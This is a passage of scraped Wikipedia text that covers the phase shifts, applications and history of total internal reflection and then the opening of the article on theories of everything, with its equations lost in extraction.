polarization of the incident wave. In equations (), (), (), (), and (), we advance the phase by the angle ϕ if we replace by (that is, if we replace by ), with the result that the (complex) field is multiplied by . So a phase advance is equivalent to multiplication by a complex constant with a negative argument. This becomes more obvious when (e.g.) the field () is factored as where the last factor contains the time dependence. To represent the polarization of the incident, reflected, or transmitted wave, the electric field adjacent to an interface can be resolved into two perpendicular components, known as the s and p components, which are parallel to the surface and the plane of incidence respectively; in other words, the s and p components are respectively square and parallel to the plane of incidence. For each component of polarization, the incident, reflected, or transmitted electric field ( in Eq.()) has a certain direction and can be represented by its (complex) scalar component in that direction. The reflection or transmission coefficient can then be defined as a ratio of complex components at the same point, or at infinitesimally separated points on opposite sides of the interface. But, in order to fix the signs of the coefficients, we must choose positive senses for the "directions". For the s components, the obvious choice is to say that the positive directions of the incident, reflected, and transmitted fields are all the same (e.g., the direction in Fig.11). For the p components, this article adopts the convention that the positive directions of the incident, reflected, and transmitted fields are inclined towards the same medium (that is, towards the same side of the interface, e.g. like the red arrows in Fig.11). But the reader should be warned that some books use a different convention for the p components, causing a different sign in the resulting formula for the reflection coefficient. For the s polarization, let the reflection and transmission coefficients be and respectively. For the p polarization, let the corresponding coefficients be and . Then, for linear, homogeneous, isotropic, non-magnetic media, the coefficients are given by (For a derivation of the above, see .) Now we suppose that the transmitted wave is evanescent. With the correct sign (+), substituting () into () gives where that is, is the index of the "internal" medium relative to the "external" one, or the index of the internal medium if the external one is vacuum. So the magnitude of is 1, and the argument of is which gives a phase advance of Making the same substitution in (), we find that has the same denominator as with a positive real numerator (instead of a complex conjugate numerator) and therefore has half the argument of , so that the phase advance of the evanescent wave is half that of the reflected wave. With the same choice of sign, substituting () into () gives whose magnitude is 1, and whose argument is which gives a phase advance of Making the same substitution in (), we again find that the phase advance of the evanescent wave is half that of the reflected wave. Equations () and () apply when , where θi is the angle of incidence, and θc is the critical angle . These equations show that each phase advance is zero at the critical angle (for which the numerator is zero); each phase advance approaches 180° as ; and at intermediate values of θi (because the factor is in the numerator of () and the denominator of ()). For , the reflection coefficients are given by equations () and () and are real, so that the phase shift is either 0° (if the coefficient is positive) or 180° (if the coefficient is negative). In (), if we put (Snell's law) and multiply the numerator and denominator by , we obtain which is positive for all angles of incidence with a transmitted ray (since ), giving a phase shift of zero. If we do likewise with (), the result is easily shown to be equivalent to which is negative for small angles (that is, near normal incidence), but changes sign at Brewster's angle, where θi and θt are complementary. Thus the phase shift is 180° for small θi but switches to 0° at Brewster's angle. Combining the complementarity with Snell's law yields as Brewster's angle for dense-to-rare incidence. (Equations () and () are known as Fresnel's sine law and Fresnel's tangent law. Both reduce to 0/0 at normal incidence, but yield the correct results in the limit as . That they have opposite signs as we approach normal incidence is an obvious disadvantage of the sign convention used in this article; the corresponding advantage is that they have the same signs at grazing incidence.) That completes the information needed to plot and for all angles of incidence. This is done in Fig.13, with in red and in blue, for three refractive indices. On the angle-of-incidence scale (horizontal axis), Brewster's angle is where (red) falls from 180° to 0°, and the critical angle is where both and (red and blue) start to rise again. To the left of the critical angle is the region of partial reflection, where both reflection coefficients are real (phase 0° or 180°) with magnitudes less than 1. To the right of the critical angle is the region of total reflection, where both reflection coefficients are complex with magnitudes equal to 1. In that region, the black curves show the phase advance of the p component relative to the s component: It can be seen that a refractive index of 1.45 is not enough to give a 45° phase difference, whereas a refractive index of 1.5 is enough (by a slim margin) to give a 45° phase difference at two angles of incidence: about 50.2° and 53.3°. This 45° relative shift is employed in Fresnel's invention, now known as the Fresnel rhomb, in which the angles of incidence are chosen such that the two internal reflections cause a total relative phase shift of 90° between the two polarizations of an incident wave. This device performs the same function as a birefringent quarter-wave plate, but is more achromatic (that is, the phase shift of the rhomb is less sensitive to wavelength). Either device may be used, for instance, to transform linear polarization to circular polarization (which Fresnel also discovered) and conversely. In Fig.13, is computed by a final subtraction; but there are other ways of expressing it. Fresnel himself, in 1823, gave a formula for . Born and Wolf (1970, p.50) derive an expression for and find its maximum analytically. For TIR of a beam with finite width, the variation in the phase shift with the angle of incidence gives rise to the Goos–Hänchen effect, which is a lateral shift of the reflected beam within the plane of incidence. This effect applies to linear polarization in the s or p direction. The Imbert–Fedorov effect is an analogous effect for circular or elliptical polarization and produces a shift perpendicular to the plane of incidence. Applications Optical fibers exploit total internal reflection to carry signals over long distances with little attenuation. They are used in telecommunication cables, and in image-forming fiberscopes such as colonoscopes. In the catadioptric Fresnel lens, invented by Augustin-Jean Fresnel for use in lighthouses, the outer prisms use TIR to deflect light from the lamp through a greater angle than would be possible with purely refractive prisms, but with less absorption of light (and less risk of tarnishing) than with conventional mirrors. Other reflecting prisms that use TIR include the following (with some overlap between the categories): Image-erecting prisms for binoculars and spotting scopes include paired 45°-90°-45° Porro prisms (Fig.14), the Porro–Abbe prism, the inline Koenig and Abbe–Koenig prisms, and the compact inline Schmidt–Pechan prism. (The last consists of two components, of which one is a kind of Bauernfeind prism, which requires a reflective coating on one of its two reflecting faces, due to a sub-critical angle of incidence.) These prisms have the additional function of folding the optical path from the objective lens to the prime focus, reducing the overall length for a given primary focal length. A prismatic star diagonal for an astronomical telescope may consist of a single Porro prism (configured for a single reflection, giving a mirror-reversed image) or an Amici roof prism (which gives a non-reversed image). Roof prisms use TIR at two faces meeting at a sharp 90° angle. This category includes the Koenig, Abbe–Koenig, Schmidt–Pechan, and Amici types (already mentioned), and the roof pentaprism used in SLR cameras; the last of these requires a reflective coating on one face. A prismatic corner reflector uses three total internal reflections to reverse the direction of incoming light. The Dove prism gives an inline view with mirror-reversal. Polarizing prisms: Although the Fresnel rhomb, which converts between linear and elliptical polarization, is not birefringent (doubly refractive), there are other kinds of prisms that combine birefringence with TIR in such a way that light of a particular polarization is totally reflected while light of the orthogonal polarization is at least partly transmitted. Examples include the Nicol prism, Glan–Thompson prism, Glan–Foucault prism (or "Foucault prism"), and Glan–Taylor prism. Refractometers, which measure refractive indices, often use the critical angle. Rain sensors for automatic windscreen/windshield wipers have been implemented using the principle that total internal reflection will guide an infrared beam from a source to a detector if the outer surface of the windshield is dry, but any water drops on the surface will divert some of the light. Edge-lit LED panels, used (e.g.) for backlighting of LCD computer monitors, exploit TIR to confine the LED light to the acrylic glass pane, except that some of the light is scattered by etchings on one side of the pane, giving an approximately uniform luminous emittance. Total internal reflection microscopy (TIRM) uses the evanescent wave to illuminate small objects close to the reflecting interface. The consequent scattering of the evanescent wave (a form of frustrated TIR), makes the objects appear bright when viewed from the "external" side. In the total internal reflection fluorescence microscope (TIRFM), instead of relying on simple scattering, we choose an evanescent wavelength short enough to cause fluorescence (Fig.15). The high sensitivity of the illumination to the distance from the interface allows measurement of extremely small displacements and forces. A beam-splitter cube uses frustrated TIR to divide the power of the incoming beam between the transmitted and reflected beams. The width of the air gap (or low-refractive-index gap) between the two prisms can be made adjustable, giving higher transmission and lower reflection for a narrower gap, or higher reflection and lower transmission for a wider gap. Optical modulation can be accomplished by means of frustrated TIR with a rapidly variable gap. As the transmission coefficient is highly sensitive to the gap width (the function being approximately exponential until the gap is almost closed), this technique can achieve a large dynamic range. Optical fingerprinting devices have used frustrated TIR to record images of persons' fingerprints without the use of ink (cf. Fig.11). Gait analysis can be performed by using frustrated TIR with a high-speed camera, to capture and analyze footprints. A gonioscope, used in optometry and ophthalmology for the diagnosis of glaucoma, suppresses TIR in order to look into the angle between the iris and the cornea. This view is usually blocked by TIR at the cornea-air interface. The gonioscope replaces the air with a higher-index medium, allowing transmission at oblique incidence, typically followed by reflection in a "mirror", which itself may be implemented using TIR. Some multi-touch interactive tables and whiteboards utilise FTIR to detect fingers touching the screen. An infrared camera is placed behind the screen surface, which is edge-lit by infrared LEDs; when touching the surface FTIR causes some of the infrared light to escape the screen plane, and the camera sees this as bright areas. Computer vision software is then used to translate this into a series of coordinates and gestures. History Discovery The surprisingly comprehensive and largely correct explanations of the rainbow by Theodoric of Freiberg (written between 1304 and 1310) and Kamāl al-Dīn al-Fārisī (completed by 1309), although sometimes mentioned in connection with total internal reflection (TIR), are of dubious relevance because the internal reflection of sunlight in a spherical raindrop is not total. But, according to Carl Benjamin Boyer, Theodoric's treatise on the rainbow also classified optical phenomena under five causes, the last of which was "a total reflection at the boundary of two transparent media". Theodoric's work was forgotten until it was rediscovered by Giovanni Battista Venturi in 1814. Theodoric having fallen into obscurity, the discovery of TIR was generally attributed to Johannes Kepler, who published his findings in his Dioptrice in 1611. Although Kepler failed to find the true law of refraction, he showed by experiment that for air-to-glass incidence, the incident and refracted rays rotated in the same sense about the point of incidence, and that as the angle of incidence varied through ±90°, the angle of refraction (as we now call it) varied through ±42°. He was also aware that the incident and refracted rays were interchangeable. But these observations did not cover the case of a ray incident from glass to air at an angle beyond 42°, and Kepler promptly concluded that such a ray could only be reflected. René Descartes rediscovered the law of refraction and published it in his Dioptrique of 1637. In the same work he mentioned the senses of rotation of the incident and refracted rays and the condition of TIR. But he neglected to discuss the limiting case, and consequently failed to give an expression for the critical angle, although he could easily have done so. Huygens and Newton: Rival explanations Christiaan Huygens, in his Treatise on Light (1690), paid much attention to the threshold at which the incident ray is "unable to penetrate into the other transparent substance". Although he gave neither a name nor an algebraic expression for the critical angle, he gave numerical examples for glass-to-air and water-to-air incidence, noted the large change in the angle of refraction for a small change in the angle of incidence near the critical angle, and cited this as the cause of the rapid increase in brightness of the reflected ray as the refracted ray approaches the tangent to the interface. Huygens' insight is confirmed by modern theory: in Eqs.() and () above, there is nothing to say that the reflection coefficients increase exceptionally steeply as θt approaches 90°, except that, according to Snell's law, θt itself is an increasingly steep function of θi. Huygens offered an explanation of TIR within the same framework as his explanations of the laws of rectilinear propagation, reflection, ordinary refraction, and even the extraordinary refraction of "Iceland crystal" (calcite). That framework rested on two premises: first, every point crossed by a propagating wavefront becomes a source of secondary wavefronts ("Huygens' principle"); and second, given an initial wavefront, any subsequent position of the wavefront is the envelope (common tangent surface) of all the secondary wavefronts emitted from the initial position. All cases of reflection or refraction by a surface are then explained simply by considering the secondary waves emitted from that surface. In the case of refraction from a medium of slower propagation to a medium of faster propagation, there is a certain obliquity of incidence beyond which it is impossible for the secondary wavefronts to form a common tangent in the second medium; this is what we now call the critical angle. As the incident wavefront approaches this critical obliquity, the refracted wavefront becomes concentrated against the refracting surface, augmenting the secondary waves that produce the reflection back into the first medium. Huygens' system even accommodated partial reflection at the interface between different media, albeit vaguely, by analogy with the laws of collisions between particles of different sizes. However, as long as the wave theory continued to assume longitudinal waves, it had no chance of accommodating polarization, hence no chance of explaining the polarization-dependence of extraordinary refraction, or of the partial reflection coefficient, or of the phase shift in TIR. Isaac Newton rejected the wave explanation of rectilinear propagation, believing that if light consisted of waves, it would "bend and spread every way" into the shadows. His corpuscular theory of light explained rectilinear propagation more simply, and it accounted for the ordinary laws of refraction and reflection, including TIR, on the hypothesis that the corpuscles of light were subject to a force acting perpendicular to the interface. In this model, for dense-to-rare incidence, the force was an attraction back towards the denser medium, and the critical angle was the angle of incidence at which the normal velocity of the approaching corpuscle was just enough to reach the far side of the force field; at more oblique incidence, the corpuscle would be turned back. Newton gave what amounts to a formula for the critical angle, albeit in words: "as the Sines are which measure the Refraction, so is the Sine of Incidence at which the total Reflexion begins, to the Radius of the Circle". Newton went beyond Huygens in two ways. First, not surprisingly, Newton pointed out the relationship between TIR and dispersion: when a beam of white light approaches a glass-to-air interface at increasing obliquity, the most strongly-refracted rays (violet) are the first to be "taken out" by "total Reflexion", followed by the less-refracted rays. Second, he observed that total reflection could be frustrated (as we now say) by laying together two prisms, one plane and the other slightly convex; and he explained this simply by noting that the corpuscles would be attracted not only to the first prism, but also to the second. In two other ways, however, Newton's system was less coherent. First, his explanation of partial reflection depended not only on the supposed forces of attraction between corpuscles and media, but also on the more nebulous hypothesis of "Fits of easy Reflexion" and "Fits of easy Transmission". Second, although his corpuscles could conceivably have "sides" or "poles", whose orientations could conceivably determine whether the corpuscles suffered ordinary or extraordinary refraction in "Island-Crystal", his geometric description of the extraordinary refraction was theoretically unsupported and empirically inaccurate. Laplace, Malus, and attenuated total reflectance (ATR) William Hyde Wollaston, in the first of a pair of papers read to the Royal Society of London in 1802, reported his invention of a refractometer based on the critical angle of incidence from an internal medium of known "refractive power" (refractive index) to an external medium whose index was to be measured. With this device, Wollaston measured the "refractive powers" of numerous materials, some of which were too opaque to permit direct measurement of an angle of refraction. Translations of his papers were published in France in 1803, and apparently came to the attention of Pierre-Simon Laplace. According to Laplace's elaboration of Newton's theory of refraction, a corpuscle incident on a plane interface between two homogeneous isotropic media was subject to a force field that was symmetrical about the interface. If both media were transparent, total reflection would occur if the corpuscle were turned back before it exited the field in the second medium. But if the second medium were opaque, reflection would not be total unless the corpuscle were turned back before it left the first medium; this required a larger critical angle than the one given by Snell's law, and consequently impugned the validity of Wollaston's method for opaque media. Laplace combined the two cases into a single formula for the relative refractive index in terms of the critical angle (minimum angle of incidence for TIR). The formula contained a parameter which took one value for a transparent external medium and another value for an opaque external medium. Laplace's theory further predicted a relationship between refractive index and density for a given substance. In 1807, Laplace's theory was tested experimentally by his protégé, Étienne-Louis Malus. Taking Laplace's formula for the refractive index as given, and using it to measure the refractive index of beeswax in the liquid (transparent) state and the solid (opaque) state at various temperatures (hence various densities), Malus verified Laplace's relationship between refractive index and density. But Laplace's theory implied that if the angle of incidence exceeded his modified critical angle, the reflection would be total even if the external medium was absorbent. Clearly this was wrong: in Eqs.() above, there is no threshold value of the angle θi beyond which κ becomes infinite; so the penetration depth of the evanescent wave (1/κ) is always non-zero, and the external medium, if it is at all lossy, will attenuate the reflection. As to why Malus apparently observed such an angle for opaque wax, we must infer that there was a certain angle beyond which the attenuation of the reflection was so small that ATR was visually indistinguishable from TIR. Fresnel and the phase shift Fresnel came to the study of total internal reflection through his research on polarization. In 1811, François Arago discovered that polarized light was apparently "depolarized" in an orientation-dependent and color-dependent manner when passed through a slice of doubly-refractive crystal: the emerging light showed colors when viewed through an analyzer (second polarizer). Chromatic polarization, as this phenomenon came to be called, was more thoroughly investigated in 1812 by Jean-Baptiste Biot. In 1813, Biot established that one case studied by Arago, namely quartz cut perpendicular to its optic axis, was actually a gradual rotation of the plane of polarization with distance. In 1816, Fresnel offered his first attempt at a wave-based theory of chromatic polarization. Without (yet) explicitly invoking transverse waves, his theory treated the light as consisting of two perpendicularly polarized components. In 1817 he noticed that plane-polarized light seemed to be partly depolarized by total internal reflection, if initially polarized at an acute angle to the plane of incidence. By including total internal reflection in a chromatic-polarization experiment, he found that the apparently depolarized light was a mixture of components polarized parallel and perpendicular to the plane of incidence, and that the total reflection introduced a phase difference between them. Choosing an appropriate angle of incidence (not yet exactly specified) gave a phase difference of 1/8 of a cycle. Two such reflections from the "parallel faces" of "two coupled prisms" gave a phase difference of 1/4 of a cycle. In that case, if the light was initially polarized at 45° to the plane of incidence and reflection, it appeared to be completely depolarized after the two reflections. These findings were reported in a memoir submitted and read to the French Academy of Sciences in November 1817. In 1821, Fresnel derived formulae equivalent to his sine and tangent laws (Eqs.() and (), above) by modeling light waves as transverse elastic waves with vibrations perpendicular to what had previously been called the plane of polarization. Using old experimental data, he promptly confirmed that the equations correctly predicted the direction of polarization of the reflected beam when the incident beam was polarized at 45° to the plane of incidence, for light incident from air onto glass or water. The experimental confirmation was reported in a "postscript" to the work in which Fresnel expounded his mature theory of chromatic polarization, introducing transverse waves. Details of the derivation were given later, in a memoir read to the academy in January 1823. The derivation combined conservation of energy with continuity of the tangential vibration at the interface, but failed to allow for any condition on the normal component of vibration. Meanwhile, in a memoir submitted in December 1822, Fresnel coined the terms linear polarization, circular polarization, and elliptical polarization. For circular polarization, the two perpendicular components were a quarter-cycle (±90°) out of phase. The new terminology was useful in the memoir of January 1823, containing the detailed derivations of the sine and tangent laws: in that same memoir, Fresnel found that for angles of incidence greater than the critical angle, the resulting reflection coefficients were complex with unit magnitude. Noting that the magnitude represented the amplitude ratio as usual, he guessed that the argument represented the phase shift, and verified the hypothesis by experiment. The verification involved calculating the angle of incidence that would introduce a total phase difference of 90° between the s and p components, for various numbers of total internal reflections at that angle (generally there were two solutions), subjecting light to that number of total internal reflections at that angle of incidence, with an initial linear polarization at 45° to the plane of incidence, and checking that the final polarization was circular. This procedure was necessary because, with the technology of the time, one could not measure the s and p phase-shifts directly, and one could not measure an arbitrary degree of ellipticality of polarization, such as might be caused by the difference between the phase shifts. But one could verify that the polarization was circular, because the brightness of the light was then insensitive to the orientation of the analyzer. For glass with a refractive index of 1.51, Fresnel calculated that a 45° phase difference between the two reflection coefficients (hence a 90° difference after two reflections) required an angle of incidence of 48°37' or 54°37'. He cut a rhomb to the latter angle and found that it performed as expected. Thus the specification of the Fresnel rhomb was completed. Similarly, Fresnel calculated and verified the angle of incidence that would give a 90° phase difference after three reflections at the same angle, and four reflections at the same angle. In each case there were two solutions, and in each case he reported that the larger angle of incidence gave an accurate circular polarization (for an initial linear polarization at 45° to the plane of reflection). For the case of three reflections he also tested the smaller angle, but found that it gave some coloration due to the proximity of the critical angle and its slight dependence on wavelength. (Compare Fig.13 above, which shows that the phase difference is more sensitive to the refractive index for smaller angles of incidence.) For added confidence, Fresnel predicted and verified that four total internal reflections at 68°27' would give an accurate circular polarization if two of the reflections had water as the external medium while the other two had air, but not if the reflecting surfaces were all wet or all dry. Fresnel's deduction of the phase shift in TIR is thought to have been the first occasion on which a physical meaning was attached to the argument of a complex number. Although this reasoning was applied without the benefit of knowing that light waves were electromagnetic, it passed the test of experiment, and survived remarkably intact after James Clerk Maxwell changed the presumed nature of the waves. Meanwhile, Fresnel's success inspired James MacCullagh and Augustin-Louis Cauchy, beginning in 1836, to analyze reflection from metals by using the Fresnel equations with a complex refractive index. The imaginary part of the complex index represents absorption. The term critical angle, used for convenience in the above narrative, is anachronistic: it apparently dates from 1873. In the 20th century, quantum electrodynamics reinterpreted the amplitude of an electromagnetic wave in terms of the probability of finding a photon. In this framework, partial transmission and frustrated TIR concern the probability of a photon crossing a boundary, and attenuated total reflectance concerns the probability of a photon being absorbed on the other side. Research into the more subtle aspects of the phase shift in TIR, including the Goos–Hänchen and Imbert–Fedorov effects and their quantum interpretations, has continued into the 21st century. Gallery
Physical sciences
Optics
Physics
30436
https://en.wikipedia.org/wiki/Theory%20of%20everything
Theory of everything
A theory of everything (TOE), final theory, ultimate theory, unified field theory, or master theory is a hypothetical singular, all-encompassing, coherent theoretical framework of physics that fully explains and links together all aspects of the universe. Finding a theory of everything is one of the major unsolved problems in physics. Over the past few centuries, two theoretical frameworks have been developed that, together, most closely resemble a theory of everything. These two theories upon which all modern physics rests are general relativity and quantum mechanics. General relativity is a theoretical framework that only focuses on gravity for understanding the universe in regions of both large scale and high mass: planets, stars, galaxies, clusters of galaxies, etc. On the other hand, quantum mechanics is a theoretical framework that focuses primarily on three non-gravitational forces for understanding the universe in regions of both very small scale and low mass: subatomic particles, atoms, and molecules. Quantum mechanics successfully implemented the Standard Model that describes the three non-gravitational forces: strong nuclear, weak nuclear, and electromagnetic force – as well as all observed elementary particles. General relativity and quantum mechanics have been repeatedly validated in their separate fields of relevance. Since the usual domains of applicability of general relativity and quantum mechanics are so different, most situations require that only one of the two theories be used. The two theories are considered incompatible in regions of extremely small scale – the Planck scale – such as those that exist within a black hole or during the beginning stages of the universe (i.e., the moment immediately following the Big Bang). To resolve the incompatibility, a theoretical framework revealing a deeper underlying reality, unifying gravity with the other three interactions, must be discovered to harmoniously integrate the realms of general relativity and quantum mechanics into a seamless whole: a theory of everything may be defined as a comprehensive theory that, in principle, would be capable of describing all physical phenomena in the universe. In pursuit of this goal, quantum gravity has become one area of active research. One example is string theory, which evolved into a candidate for the theory of everything, but not without drawbacks (most notably, its apparent lack of currently testable predictions) and controversy. String theory posits that at the beginning of the universe (up to 10−43 seconds after the Big Bang), the four fundamental forces were once a single fundamental force. According to string theory, every particle in the universe, at its most ultramicroscopic level (Planck length), consists of varying combinations of vibrating strings (or strands) with preferred patterns of vibration. String theory further claims that it is through these specific oscillatory patterns of strings that a particle of unique mass and force charge is created (that is to say, the electron is a type of string that vibrates one way, while the up quark is a type of string vibrating another way, and so forth). String theory/M-theory proposes six or seven dimensions of spacetime in addition to the four common dimensions for a ten- or eleven-dimensional spacetime. Name Initially, the term theory of everything was used with an ironic reference to various overgeneralized theories. For example, a grandfather of Ijon Tichy – a character from a cycle of Stanisław Lem's science fiction stories of the 1960s – was known to work on the "General Theory of Everything". Physicist Harald Fritzsch used the term in his 1977 lectures in Varenna. Physicist John Ellis claims to have introduced the acronym "TOE" into the technical literature in an article in Nature in 1986. Over time, the term stuck in popularizations of theoretical physics research. Historical antecedents Antiquity to 19th century Many ancient cultures such as Babylonian astronomers and Indian astronomy studied the pattern of the Seven Sacred Luminaires/Classical Planets against the background of stars, with their interest being to relate celestial movement to human events (astrology), and the goal being to predict events by recording events against a time measure and then look for recurrent patterns. The debate between the universe having either a beginning or eternal cycles can be traced to ancient Babylonia. Hindu cosmology posits that time is infinite with a cyclic universe, where the current universe was preceded and will be followed by an infinite number of universes. Time scales mentioned in Hindu cosmology correspond to those of modern scientific cosmology. Its cycles run from our ordinary day and night to a day and night of Brahma, 8.64 billion years long. The natural philosophy of atomism appeared in several ancient traditions. In ancient Greek philosophy, the pre-Socratic philosophers speculated that the apparent diversity of observed phenomena was due to a single type of interaction, namely the motions and collisions of atoms. The concept of 'atom' proposed by Democritus was an early philosophical attempt to unify phenomena observed in nature. The concept of 'atom' also appeared in the Nyaya-Vaisheshika school of ancient Indian philosophy. Archimedes was possibly the first philosopher to have described nature with axioms (or principles) and then deduce new results from them. Any "theory of everything" is similarly expected to be based on axioms and to deduce all observable phenomena from them. Following earlier atomistic thought, the mechanical philosophy of the 17th century posited that all forces could be ultimately reduced to contact forces between the atoms, then imagined as tiny solid particles. In the late 17th century, Isaac Newton's description of the long-distance force of gravity implied that not all forces in nature result from things coming into contact. Newton's work in his Mathematical Principles of Natural Philosophy dealt with this in a further example of unification, in this case unifying Galileo's work on terrestrial gravity, Kepler's laws of planetary motion and the phenomenon of tides by explaining these apparent actions at a distance under one single law: the law of universal gravitation. Newton achieved the first great unification in physics, and he further is credited with laying the foundations of future endeavors for a grand unified theory. In 1814, building on these results, Laplace famously suggested that a sufficiently powerful intellect could, if it knew the position and velocity of every particle at a given time, along with the laws of nature, calculate the position of any particle at any other time: Laplace thus envisaged a combination of gravitation and mechanics as a theory of everything. Modern quantum mechanics implies that uncertainty is inescapable, and thus that Laplace's vision has to be amended: a theory of everything must include gravitation and quantum mechanics. Even ignoring quantum mechanics, chaos theory is sufficient to guarantee that the future of any sufficiently complex mechanical or astronomical system is unpredictable. In 1820, Hans Christian Ørsted discovered a connection between electricity and magnetism, triggering decades of work that culminated in 1865, in James Clerk Maxwell's theory of electromagnetism, which achieved the second great unification in physics. During the 19th and early 20th centuries, it gradually became apparent that many common examples of forces – contact forces, elasticity, viscosity, friction, and pressure – result from electrical interactions between the smallest particles of matter. In his experiments of 1849–1850, Michael Faraday was the first to search for a unification of gravity with electricity and magnetism. However, he found no connection. In 1900, David Hilbert published a famous list of mathematical problems. In Hilbert's sixth problem, he challenged researchers to find an axiomatic basis to all of physics. In this problem he thus asked for what today would be called a theory of everything. Early 20th century In the late 1920s, the then new quantum mechanics showed that the chemical bonds between atoms were examples of (quantum) electrical forces, justifying Dirac's boast that "the underlying physical laws necessary for the mathematical theory of a large part of physics and the whole of chemistry are thus completely known". After 1915, when Albert Einstein published the theory of gravity (general relativity), the search for a unified field theory combining gravity with electromagnetism began with a renewed interest. In Einstein's day, the strong and the weak forces had not yet been discovered, yet he found the potential existence of two other distinct forces, gravity and electromagnetism, far more alluring. This launched his 40-year voyage in search of the so-called "unified field theory" that he hoped would show that these two forces are really manifestations of one grand, underlying principle. During the last few decades of his life, this ambition alienated Einstein from the rest of mainstream of physics, as the mainstream was instead far more excited about the emerging framework of quantum mechanics. Einstein wrote to a friend in the early 1940s, "I have become a lonely old chap who is mainly known because he doesn't wear socks and who is exhibited as a curiosity on special occasions." Prominent contributors were Gunnar Nordström, Hermann Weyl, Arthur Eddington, David Hilbert, Theodor Kaluza, Oskar Klein (see Kaluza–Klein theory), and most notably, Albert Einstein and his collaborators. Einstein searched in earnest for, but ultimately failed to find, a unifying theory (see Einstein–Maxwell–Dirac equations). Late 20th century and the nuclear interactions In the 20th century, the search for a unifying theory was interrupted by the discovery of the strong and weak nuclear forces, which differ both from gravity and from electromagnetism. A further hurdle was the acceptance that in a theory of everything, quantum mechanics had to be incorporated from the outset, rather than emerging as a consequence of a deterministic unified theory, as Einstein had hoped. Gravity and electromagnetism are able to coexist as entries in a list of classical forces, but for many years it seemed that gravity could not be incorporated into the quantum framework, let alone unified with the other fundamental forces. For this reason, work on unification, for much of the 20th century, focused on understanding the three forces described by quantum mechanics: electromagnetism and the weak and strong forces. The first two were combined in 1967–1968 by Sheldon Glashow, Steven Weinberg, and Abdus Salam into the electroweak force. Electroweak unification is a broken symmetry: the electromagnetic and weak forces appear distinct at low energies because the particles carrying the weak force, the W and Z bosons, have non-zero masses ( and , respectively), whereas the photon, which carries the electromagnetic force, is massless. At higher energies W bosons and Z bosons can be created easily and the unified nature of the force becomes apparent. While the strong and electroweak forces coexist under the Standard Model of particle physics, they remain distinct. Thus, the pursuit of a theory of everything remained unsuccessful: neither a unification of the strong and electroweak forces – which Laplace would have called 'contact forces' – nor a unification of these forces with gravitation had been achieved. Modern physics Conventional sequence of theories A theory of everything would unify all the fundamental interactions of nature: gravitation, the strong interaction, the weak interaction, and electromagnetism. Because the weak interaction can transform elementary particles from one kind into another, the theory of everything should also predict all the different kinds of particles possible. The usual assumed path of theories is given in the following graph, where each unification step leads one level up on the graph. In this graph, electroweak unification occurs at around 100 GeV, grand unification is predicted to occur at 1016 GeV, and unification of the GUT force with gravity is expected at the Planck energy, roughly 1019 GeV. Several Grand Unified Theories (GUTs) have been proposed to unify electromagnetism and the weak and strong forces. Grand unification would imply the existence of an electronuclear force; it is expected to set in at energies of the order of 1016 GeV, far greater than could be reached by any currently feasible particle accelerator. Although the simplest grand unified theories have been experimentally ruled out, the idea of a grand unified theory, especially when linked with supersymmetry, remains a favorite candidate in the theoretical physics community. Supersymmetric grand unified theories seem plausible not only for their theoretical "beauty", but because they naturally produce large quantities of dark matter, and because the inflationary force may be related to grand unified theory physics (although it does not seem to form an inevitable part of the theory). Yet grand unified theories are clearly not the final answer; both the current standard model and all proposed GUTs are quantum field theories which require the problematic technique of renormalization to yield sensible answers. This is usually regarded as a sign that these are only effective field theories, omitting crucial phenomena relevant only at very high energies. The final step in the graph requires resolving the separation between quantum mechanics and gravitation, often equated with general relativity. Numerous researchers concentrate their efforts on this specific step; nevertheless, no accepted theory of quantum gravity, and thus no accepted theory of everything, has emerged with observational evidence. It is usually assumed that the theory of everything will also solve the remaining problems of grand unified theories. In addition to explaining the forces listed in the graph, a theory of everything may also explain the status of at least two candidate forces suggested by modern cosmology: an inflationary force and dark energy. Furthermore, cosmological experiments also suggest the existence of dark matter, supposedly composed of fundamental particles outside the scheme of the standard model. However, the existence of these forces and particles has not been proven. String theory and M-theory Since the 1990s, some physicists such as Edward Witten believe that 11-dimensional M-theory, which is described in some limits by one of the five perturbative superstring theories, and in another by the maximally-supersymmetric eleven-dimensional supergravity, is the theory of everything. There is no widespread consensus on this issue. One remarkable property of string/M-theory is that seven extra dimensions are required for the theory's consistency, on top of the four dimensions in our universe. In this regard, string theory can be seen as building on the insights of the Kaluza–Klein theory, in which it was realized that applying general relativity to a 5-dimensional universe, with one space dimension small and curled up, looks from the 4-dimensional perspective like the usual general relativity together with Maxwell's electrodynamics. This lent credence to the idea of unifying gauge and gravity interactions, and to extra dimensions, but did not address the detailed experimental requirements. Another important property of string theory is its supersymmetry, which together with extra dimensions are the two main proposals for resolving the hierarchy problem of the standard model, which is (roughly) the question of why gravity is so much weaker than any other force. The extra-dimensional solution involves allowing gravity to propagate into the other dimensions while keeping other forces confined to a 4-dimensional spacetime, an idea that has been realized with explicit stringy mechanisms. Research into string theory has been encouraged by a variety of theoretical and experimental factors. On the experimental side, the particle content of the standard model supplemented with neutrino masses fits into a spinor representation of SO(10), a subgroup of E8 that routinely emerges in string theory, such as in heterotic string theory or (sometimes equivalently) in F-theory. String theory has mechanisms that may explain why fermions come in three hierarchical generations, and explain the mixing rates between quark generations. On the theoretical side, it has begun to address some of the key questions in quantum gravity, such as resolving the black hole information paradox, counting the correct entropy of black holes and allowing for topology-changing processes. It has also led to many insights in pure mathematics and in ordinary, strongly-coupled gauge theory due to the Gauge/String duality. In the late 1990s, it was noted that one major hurdle in this endeavor is that the number of possible 4-dimensional universes is incredibly large. The small, "curled up" extra dimensions can be compactified in an enormous number of different ways (one estimate is 10500 ) each of which leads to different properties for the low-energy particles and forces. This array of models is known as the string theory landscape. One proposed solution is that many or all of these possibilities are realized in one or another of a huge number of universes, but that only a small number of them are habitable. Hence what we normally conceive as the fundamental constants of the universe are ultimately the result of the anthropic principle rather than dictated by theory. This has led to criticism of string theory, arguing that it cannot make useful (i.e., original, falsifiable, and verifiable) predictions and regarding it as a pseudoscience/philosophy. Others disagree, and string theory remains an active topic of investigation in theoretical physics. Loop quantum gravity Current research on loop quantum gravity may eventually play a fundamental role in a theory of everything, but that is not its primary aim. Loop quantum gravity also introduces a lower bound on the possible length scales. There have been recent claims that loop quantum gravity may be able to reproduce features resembling the Standard Model. So far only the first generation of fermions (leptons and quarks) with correct parity properties have been modelled by Sundance Bilson-Thompson using preons constituted of braids of spacetime as the building blocks. However, there is no derivation of the Lagrangian that would describe the interactions of such particles, nor is it possible to show that such particles are fermions, nor that the gauge groups or interactions of the Standard Model are realised. Use of quantum computing concepts made it possible to demonstrate that the particles are able to survive quantum fluctuations. This model leads to an interpretation of electric and color charge as topological quantities (electric as number and chirality of twists carried on the 